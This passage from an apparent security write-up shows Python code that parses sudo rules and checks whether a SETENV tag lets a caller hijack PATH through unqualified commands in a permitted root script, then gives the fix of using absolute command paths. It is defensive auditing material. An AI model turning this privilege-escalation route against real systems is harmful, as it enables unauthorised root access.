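    return {"runas": m.group("runas").strip(), "tags": tags,
            "command": m.group("command").strip()}


def path_hijack_possible(rule, script_text):
    """True when the rule lets the caller override PATH (SETENV) and the permitted
    script resolves at least one command through it. Without SETENV, the
    secure_path default shown on this box pins PATH and the bare name is safe."""
    return "SETENV" in rule["tags"] and bool(unqualified_commands(script_text))


if __name__ == "__main__":
    script = "#!/bin/bash\ntail -n 10 /var/log/syslog\n"
    rule = parse_sudo_rule("(root : root) SETENV: /usr/bin/check_syslog.sh")
    print(rule, unqualified_commands(script), path_hijack_possible(rule, script))
```

The fix on the script side is the one the page's root cause implies: write /usr/bin/tail, after which unqualified_commands returns nothing and the SETENV tag no longer matters for this rule.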